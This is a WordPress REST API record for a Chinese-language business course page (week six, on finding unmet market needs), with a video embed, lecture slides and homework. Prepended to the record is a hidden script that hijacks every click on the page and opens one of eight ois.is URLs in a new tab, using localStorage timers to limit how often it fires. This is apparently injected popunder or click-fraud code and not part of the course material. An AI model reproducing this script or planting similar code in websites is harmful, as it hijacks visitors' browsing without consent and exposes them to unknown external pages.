<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":873,"date":"2014-10-11T11:36:12","date_gmt":"2014-10-11T03:36:12","guid":{"rendered":"http:\/\/edu.secda.info\/phil999_course02\/?page_id=873"},"modified":"2020-02-20T18:01:31","modified_gmt":"2020-02-20T10:01:31","slug":"%e7%ab%a0%e7%af%801-5","status":"publish","type":"page","link":"https:\/\/edu.secda.info\/phil999_course02\/?page_id=873","title":{"rendered":"\u7b2c\u516d\u9031 \u767c\u5c55\u5e02\u5834\u65b0\u6a5f\u6703(\u4e8c)"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"873\" class=\"elementor elementor-873\" data-elementor-settings=\"[]\">\r\n\t\t\t\t\t\t<div class=\"elementor-inner\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-section-wrap\">\r\n\t\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9634a4a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9634a4a\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-28784cb\" data-id=\"28784cb\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a6c2303 elementor-widget elementor-widget-heading\" data-id=\"a6c2303\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u8ab2\u524d\u6e96\u5099<\/h2>\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<div class=\"elementor-element elementor-element-1c495f2 elementor-widget elementor-widget-accordion\" data-id=\"1c495f2\" data-element_type=\"widget\" data-widget_type=\"accordion.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-accordion\" role=\"tablist\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-accordion-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-2961\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"tab\" aria-controls=\"elementor-tab-content-2961\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon elementor-accordion-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-closed\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-opened\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"elementor-accordion-title\" href=\"\">\u9810\u7fd2<\/a>\r\n\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<div id=\"elementor-tab-content-2961\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-2961\"><p>\u672c\u5468\u4e3b\u8981\u5b78\u7fd2\u5f9e\u65e2\u6709\u7684\u7db2\u7ad9\uff0c\u5982\u4f55\u767c\u73fe\u672a\u88ab\u6eff\u8db3\u7684\u9700\u6c42\uff0c\u5b58\u5728\u7684\u75db\u9ede\u5c1a\u672a\u88ab\u89e3\u6c7a\u3001\u54ea\u4e9b\u53ef\u4ee5\u63d0\u5347\u50f9\u503c\uff0c\u4e26\u7372\u53d6\u5229\u6f64<\/p><p>\u5728L403\u4e0a\u8ab2\uff0c\u6bcf\u7d44\u81ea\u5099\u81f3\u5c11\u4e00\u53f0\u7b46\u96fb(\u5df2\u7d93\u5b8c\u6210\u4e0b\u518dxmind\u5fc3\u667a\u5716\u8edf\u9ad4)\u3002<\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f5fca23 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f5fca23\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-fbb9755\" data-id=\"fbb9755\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-00c30c1 elementor-widget-divider--view-line elementor-widget elementor-widget-divider\" data-id=\"00c30c1\" data-element_type=\"widget\" data-widget_type=\"divider.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-divider\">\r\n\t\t\t<span class=\"elementor-divider-separator\">\r\n\t\t\t\t\t\t<\/span>\r\n\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-5d3bf94 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"5d3bf94\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f3f10fd\" data-id=\"f3f10fd\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3ebbf72 elementor-widget elementor-widget-heading\" data-id=\"3ebbf72\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u4e0a\u8ab2\u7d00\u9304<\/h2>\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<div class=\"elementor-element elementor-element-1c5cb2d elementor-widget elementor-widget-toggle\" data-id=\"1c5cb2d\" data-element_type=\"widget\" data-widget_type=\"toggle.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-toggle\" role=\"tablist\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-toggle-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-2971\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"tab\" aria-controls=\"elementor-tab-content-2971\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon elementor-toggle-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-closed\"><i class=\"fas fa-caret-right\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-opened\"><i class=\"elementor-toggle-icon-opened fas fa-caret-up\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"\" class=\"elementor-toggle-title\">\u4e0a\u8ab2\u5f71\u7247<\/a>\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t\t<div id=\"elementor-tab-content-2971\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-2971\"><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/sva_Kcqd05Q\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><\/iframe>\n<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t<div class=\"elementor-toggle-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-2972\" class=\"elementor-tab-title\" data-tab=\"2\" role=\"tab\" aria-controls=\"elementor-tab-content-2972\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon elementor-toggle-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-closed\"><i class=\"fas fa-caret-right\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-toggle-icon-opened\"><i class=\"elementor-toggle-icon-opened fas fa-caret-up\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"\" class=\"elementor-toggle-title\">\u8ab2\u7a0bPPT<\/a>\r\n\t\t\t\t\t<\/div>\r\n\r\n\t\t\t\t\t<div id=\"elementor-tab-content-2972\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"2\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-2972\">[wonderplugin_pdf src=&#8221;\/\/edu.secda.info\/phil999_course02\/wp-content\/uploads\/2020\/02\/step2_V2_20181015.pdf&#8221; width=&#8221;100%&#8221; height=&#8221;600px&#8221; style=&#8221;border:0;&#8221;]<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-56b7e4b elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"56b7e4b\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-3c84d88\" data-id=\"3c84d88\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-b5e3ea2 elementor-widget-divider--view-line elementor-widget elementor-widget-divider\" data-id=\"b5e3ea2\" data-element_type=\"widget\" data-widget_type=\"divider.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-divider\">\r\n\t\t\t<span class=\"elementor-divider-separator\">\r\n\t\t\t\t\t\t<\/span>\r\n\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-232db01 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"232db01\" data-element_type=\"section\">\r\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\r\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-074934e\" data-id=\"074934e\" data-element_type=\"column\">\r\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\r\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f8051db elementor-widget elementor-widget-heading\" data-id=\"f8051db\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u8ab2\u5f8c\u5b8c\u6210\u4e8b\u9805<\/h2>\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<div class=\"elementor-element elementor-element-4e57dd6 elementor-widget elementor-widget-accordion\" data-id=\"4e57dd6\" data-element_type=\"widget\" data-widget_type=\"accordion.default\">\r\n\t\t\t\t<div class=\"elementor-widget-container\">\r\n\t\t\t\t\t<div class=\"elementor-accordion\" role=\"tablist\">\r\n\t\t\t\t\t\t\t<div class=\"elementor-accordion-item\">\r\n\t\t\t\t\t<div id=\"elementor-tab-title-8211\" class=\"elementor-tab-title\" data-tab=\"1\" role=\"tab\" aria-controls=\"elementor-tab-content-8211\" aria-expanded=\"false\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon elementor-accordion-icon-left\" aria-hidden=\"true\">\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-closed\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t<span class=\"elementor-accordion-icon-opened\"><i class=\"fas fa-book-open\"><\/i><\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span>\r\n\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"elementor-accordion-title\" href=\"\">\u4f5c\u696d<\/a>\r\n\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<div id=\"elementor-tab-content-8211\" class=\"elementor-tab-content elementor-clearfix\" data-tab=\"1\" role=\"tabpanel\" aria-labelledby=\"elementor-tab-title-8211\"><p><span style=\"color: #000000;\">1. \u6574\u5408\u4e09\u5bb6\u7db2\u7ad9\u7684\u50f9\u503c\u4e3b\u5f35\u4ee5\u53ca\u503c\u5f97\u4fdd\u7559\u7684\u50f9\u503c\u6d3b\u52d5(\u529f\u80fd\u3001\u670d\u52d9\u9805\u76ee\u3001\u4f5c\u696d\u5167\u5bb9)\u3002<\/span><\/p><p><span style=\"color: #000000;\">2. \u5b8c\u6210&#8221;1.\u767c\u73fe\u5e02\u5834\u65b0\u6a5f\u6703&#8221;\u4e2d\u7684&#8221;\u672a\u88ab\u6eff\u8db3&#8221;\u9805\u76ee\u3002\u5217\u51fa\u75db\u9ede\u4ee5\u53ca\u672a\u88ab\u6eff\u8db3\u7684\u9700\u6c42\u3002\u9019\u4e9b\u672a\u88ab\u6eff\u8db3\u7684\u9700\u6c42\u5c31\u662f\u5927\u5bb6\u672a\u4f86\u53ef\u5275\u65b0\/\u6539\u8b8a\u7684\u767c\u5c55\u65b9\u5411\u3002<\/span><\/p><p><span style=\"color: #000000;\">3. 4\u67081\u65e5(\u65e5)\u665a\u4e0a12\u9ede\u5b8c\u6210&#8221;1. \u767c\u73fe\u5e02\u5834\u65b0\u6a5f\u6703&#8221;\uff0c\u53e6\u5b58\u65b0\u6a94\uff0c\u4e0a\u50b3\u5230\u5718\u968a\u4f5c\u696d\u7e73\u4ea4\u5340<\/span><\/p><\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t<\/section>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t","protected":false},"excerpt":{"rendered":"<p>\u8ab2\u524d\u6e96\u5099 \u9810\u7fd2 \u672c\u5468\u4e3b\u8981\u5b78\u7fd2\u5f9e\u65e2\u6709\u7684\u7db2\u7ad9\uff0c\u5982\u4f55\u767c\u73fe\u672a\u88ab\u6eff\u8db3\u7684\u9700\u6c42\uff0c\u5b58\u5728\u7684\u75db\u9ede\u5c1a\u672a<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":853,"menu_order":6,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0},"_links":{"self":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/873"}],"collection":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=873"}],"version-history":[{"count":7,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/873\/revisions"}],"predecessor-version":[{"id":1529,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/873\/revisions\/1529"}],"up":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=\/wp\/v2\/pages\/853"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/phil999_course02\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=873"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}